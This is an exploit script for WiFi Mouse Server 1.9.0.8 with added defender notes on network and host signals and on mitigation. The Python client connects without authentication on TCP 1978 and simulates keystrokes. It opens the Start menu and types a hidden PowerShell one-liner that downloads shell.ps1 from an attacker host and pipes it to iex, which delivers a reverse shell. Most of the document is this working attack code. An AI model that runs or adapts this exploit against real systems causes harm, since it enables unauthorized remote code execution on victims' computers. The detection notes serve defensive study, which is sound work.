# Exploit Title: Wifi Mouse version 1.9.0.8 - Remote Code Execution
# Date: 19/07/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://wifimouse.necta.us/
# Software Link: https://wifimouse.necta.us/apk/MouseServer.exe
# Version: 1.9.0.8 (Windows)
# Tested on: Windows 10 / Windows 11
#
# Reviewer notes for defenders (derived only from the code on this page):
#   * Root cause as described: the desktop server accepts keyboard-injection
#     commands on TCP 1978 and the client below never sends a credential,
#     so any host that can reach the port can type on the desktop.
#   * Network signal: an inbound TCP 1978 session that starts with the two
#     handshake lines from connect() and is followed by a burst of
#     "key ..." / "utf8 ..." messages at machine-regular intervals.
#   * Host signal: a PowerShell command line carrying "-nop -w hidden" and
#     "iwr ... | iex", followed by an outbound HTTP fetch of a .ps1 file.
#     Presumably the process is started from the Start menu, not as a
#     child of the mouse server -- verify in your own telemetry.
#   * Mitigation: restrict TCP 1978 to trusted hosts with the host firewall,
#     or stop/remove the server on machines that share a network with
#     untrusted devices. No fixed version is named on this page.
#   * The listing was flattened when the page was extracted; the
#     indentation below is reconstructed, and the spots where the original
#     nesting cannot be determined are marked NOTE(review).

'''
Description:
WiFi Mouse Server 1.9.0.8 allows unauthenticated remote code execution by simulating
keyboard input over TCP port 1978. This exploit connects to the server and simulates
keystrokes to deliver a reverse shell.
'''

import socket
import time


class RemoteControlClient:
    """Minimal client for the WiFi Mouse desktop server's TCP control channel.

    It only opens a socket, sends two handshake lines and then emits key and
    text messages; nothing in this class authenticates to the server.
    """

    def __init__(self, ip="192.168.8.103", port=1978):
        """Store the server address; no connection is made until connect()."""
        self.target_ip = ip
        self.target_port = port
        self.socket = None
        self.output_stream = None
        # Set here and never read anywhere in the visible code.
        self.isystem = 0

    def connect(self):
        """Open the TCP session and send the two handshake lines.

        No timeout is set on the socket, so the recv() below blocks until
        the server sends something or closes the connection.
        """
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.socket.connect((self.target_ip, self.target_port))
        # Binary write-side file object used by _send_command(); send_text()
        # bypasses it and writes to the raw socket instead.
        self.output_stream = self.socket.makefile('wb')
        handshake = [b"reportCurrentApp\x0a", b"dontreportCurrentApp\x0a"]
        for cmd in handshake:
            self.socket.sendall(cmd)
            time.sleep(0.08)
        # NOTE(review): indentation was lost on this page; whether this read
        # sits inside or after the loop cannot be determined from here.
        # The reply is discarded either way.
        self.socket.recv(1024)

    def _send_command(self, prefix, command):
        """Write one "<prefix> <len><command>" message and flush it.

        The length is len(command) in characters, taken before UTF-8
        encoding. No newline terminator is appended here.
        """
        length = len(command)
        # NOTE(review): both branches are identical as printed on this page,
        # so the conditional currently has no effect.
        length_prefix = f"{prefix} {length}" if length < 10 else f"{prefix} {length}"
        message = (length_prefix + command).encode('utf-8')
        self.output_stream.write(message)
        self.output_stream.flush()
        # Short pause after every message.
        time.sleep(0.03)

    def send_key(self, key_name, action="press"):
        """Send a named key as a down event, an up event, or both.

        Friendly names are translated through key_mapping; a name that is
        not in the table is passed through unchanged (the upper-casing only
        applies to the lookup). An action other than "press", "down" or
        "up" sends nothing.
        """
        key_mapping = {"ENTER":"RTN","BACKSPACE":"BAS","DEL":"BAS","WIN":"WIN","ALT":"ALT"}
        key_name = key_mapping.get(key_name.upper(), key_name)
        if action == "press":
            # A press is a down event, a 70 ms hold, then an up event.
            self._send_command("key", f"[R] {key_name} d")
            time.sleep(0.07)
            self._send_command("key", f"[R] {key_name} u")
        elif action == "down":
            self._send_command("key", f"[R] {key_name} d")
        elif action == "up":
            self._send_command("key", f"[R] {key_name} u")

    def send_key_code(self, key_code, action="press"):
        """Send a key identified by a numeric code.

        66 and 67 are routed to send_key() as RTN and BAS (presumably the
        Android key codes for Enter and Delete -- confirm). Any other code
        is sent raw, suffixed with the first character of ``action``, so
        the default "press" yields "p" rather than a down/up pair.
        """
        if key_code == 66:
            self.send_key("RTN", action)
        elif key_code == 67:
            self.send_key("BAS", action)
        else:
            # The page breaks its line inside this literal, directly after
            # "[R] "; it is rejoined here with that single space.
            self._send_command("key", f"[R] {key_code} {action[0]}")

    def send_text(self, text):
        """Type ``text`` one character at a time.

        Newline and backspace become key presses; every other character is
        sent as its own newline-terminated "utf8 <char>" line on the raw
        socket.
        """
        for char in text:
            if char == '\n':
                self.send_key("ENTER")
            elif char == '\b':
                self.send_key("BACKSPACE")
            else:
                self.socket.sendall(f"utf8 {char}\x0a".encode('utf-8'))
                # NOTE(review): indentation was lost on this page; this
                # pause is kept with the sendall it follows. It may instead
                # have applied to every loop iteration -- confirm.
                time.sleep(0.09)

    def execute_payload(self):
        """Run the proof-of-concept keystroke sequence end to end.

        Connects, presses the WIN key, types a PowerShell one-liner that
        downloads a script from a hard-coded address and pipes it to iex,
        presses Enter, then types "exit" and presses Enter again. Every
        exception is swallowed, so a failed run is indistinguishable from a
        successful one; only the socket is closed afterwards
        (output_stream is never closed explicitly).
        """
        try:
            self.connect()
            time.sleep(0.9)
            # Presumably opens the Start menu so the typed text lands in its
            # search box -- not verifiable from this code alone.
            self.send_key("WIN")
            time.sleep(0.9)
            # This exact command line (no profile, hidden window, download
            # piped to iex) is what endpoint logging would record.
            self.send_text("powershell -nop -w hidden -c \"iwr http://192.168.8.102:8080/shell.ps1 -UseBasicParsing | iex\"")
            time.sleep(1)
            self.send_key_code(66)
            time.sleep(1)
            self.send_text("exit")
            self.send_key_code(66)
        except Exception:
            pass
        finally:
            if self.socket:
                self.socket.close()


if __name__ == "__main__":
    # Runs against the default address hard-coded in __init__.
    rc = RemoteControlClient()
    rc.execute_payload()